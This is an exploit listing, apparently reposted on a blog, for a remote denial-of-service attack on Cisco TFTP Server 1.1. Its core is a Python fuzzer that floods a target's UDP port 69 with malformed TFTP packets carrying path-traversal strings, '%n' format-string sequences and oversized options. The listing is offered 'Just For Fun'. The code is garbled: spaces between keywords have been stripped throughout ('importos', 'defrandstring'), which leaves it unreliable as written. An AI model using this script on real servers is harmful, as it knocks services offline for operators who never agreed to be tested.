# Exploit Title: [Cisco TFTP Server 1.1]# Date: [2010-03-25] |
# Author: [_SuBz3r0_] |
# Software Link: [http://www.oldversion.com/Cisco_TFTP_Server.html] |
# Version: [1.1] |
# Tested on: [XP SP3,Win2k3] |
# CVE : [if exists] |
# Code : |
#Cisco TFTP Server v1.1 DoS |
print "" |
print "##############################################" |
print "# _SuBz3r0_ #" |
print "##############################################" |
print "" |
print "Cisco TFTP v1.1 Remote DoS" |
print "Just For Fun" |
print "tftp_fuzz.py [ip of server]" |
print "" |
print "Greetz:piloo le canari & MaX" |
print "Credits to Ilja van Sprundel" |
print "Tested on: French Windows Xp Sp3 fully Patched" |
print "" |
|
#!/usr/bin/python
# tftpd fuzzer by Ilja van Sprundel
# implements rfc 1350, 2090, 2347, 2348, 2349
#
# todo: - 1 option per packet
# - lots (>100) (small) options per packet
# - add better option support to OACK
# - client fuzzing ?
importos, socket, sys, struct, random
port=69
type=["netascii","octet","binary","mail"]
asize=["blkzise","tsize"]
classfuzz:
def__init__(self):
""" """
defrandstring(self,len):
thestring=""
what=random.randint(0,5)
ifwhat <5:
foriinrange(len):
char=chr(random.randint(1,255))
thestring+=char
else:
thestring="%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"
returnthestring
defrandbin(self,len):
thestring=""
foriinrange(len):
char=chr(random.randint(0,255))
thestring+=char
returnthestring
deffuzz_rw(self):
""" """
data=""
ifnotrandom.randint(0,50):
return""
ifnotrandom.randint(0,10):
ifrandom.randint(0,1):
data="../"
else:
howmany=random.randint(1,100)
data="../"*howmany
data+=self.randstring(random.randint(0,3000))
# no 0byte
ifnotrandom.randint(0,10):
returndata
data+="\0"
# no mode
ifnotrandom.randint(0,100):
returndata
ifrandom.randint(0,5):
data+=random.choice(type)
else:
data+=self.randstring(random.randint(0,3000))
ifnotrandom.randint(0,10):
returndata
data+="\0"
ifnotrandom.randint(0,10):
returndata
options=random.randint(0,100)
ifnotrandom.randint(0,10):
breakloop=1
breakit=random.randint(0, options)
else:
breakloop=0
longarg=random.randint(0, options)
ifnotrandom.randint(0,10):
lowlimit=16
options=options/4
else:
lowlimit=0
foriinrange(options):
which=random.randint(lowlimit,19)
ifwhich <16:
iflongarg==i:
data+=self.randstring(random.randint(0,3000))
else:
data+=self.randstring(random.randint(0,100))
data+="\0"
data+=self.randstring(random.randint(0,100))
ifwhich==16:
data+="multicast\0"
ifnotrandom.randint(0,5):
ifrandom.randint(0,1):
data+=self.randstring(random.randint(0,50))
else:
data+=str(random.randint(0,0xffffffff))
ifwhich==17orwhich==18:
data+=random.choice(asize)+"\0"
ifrandom.randint(0,10):
ifrandom.randint(0,1):
uplimit=65535
else:
uplimit=0xffffffff
string=str(random.randint(0, uplimit))
ifrandom.randint(0,1):
data+="-"
data+=string
else:
data+=self.randstring(random.randint(0,50))
ifwhich==19:
data+="timeout\0"
ifrandom.randint(0,10):
which=random.randint(0,5)
ifwhich <4:
uplimit=255
ifwhich==4:
uplimit=65535
else:
uplimit=0xffffffff
string=str(random.randint(0, uplimit))
ifrandom.randint(0,1):
data+="-"
data+=string
else:
data+=self.randstring(random.randint(0,50))
ifbreakloop:
ifi==breakit:
returndata
data+="\0"
returndata
defmake_data(self):
""" """
which=random.randint(0,10)
ifwhich <6:
# read is more likely to be accepted then write
# hence we bias it towards reading !
ifrandom.randint(0,2):
d="\x00\x01"
else:
d="\x00\x02"
d+=self.fuzz_rw()
# do some tftpd's do something with this ???
elifwhich==6:
d="\x00\x03"
d+=self.randbin(2)
d+=self.randbin(random.randint(0,3000))
elifwhich==7:
d="\x00\x04"
d+=self.randbin(2)
ifnotrandom.randint(0,10):
d+=self.randbin(random.randint(0,3000))
elifwhich==8:
d="\x00\x05"
d+=self.randbin(2)
d+=self.randstring(random.randint(0,1000))
ifrandom.randint(0,10):
d+="\0"
elifwhich==9:
# lets do this later ....
d="\x00\x06"
d+=self.randbin(1000)
else:
ifrandom.randint(0,2):
times=512
else:
times=random.randint(512,10000)
d=self.randbin(random.randint(0,times))
returnd
defrun(self):
""" """
packets=0
try:
while1:
try:
s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
"socket() failed"
sys.exit(1)
da=self.make_data()
s.sendto(da, (host, port))
s.close()
os.write(1,".")
packets+=1
exceptKeyboardInterrupt:
"\nPackets: "+str(packets)
if__name__=='__main__':
iflen(sys.argv) <=1:
sys.exit(0)
host=sys.argv[1]
iflen(sys.argv) >=3:
port=sys.argv[2]
f=fuzz()f.run()
No comments:
Post a Comment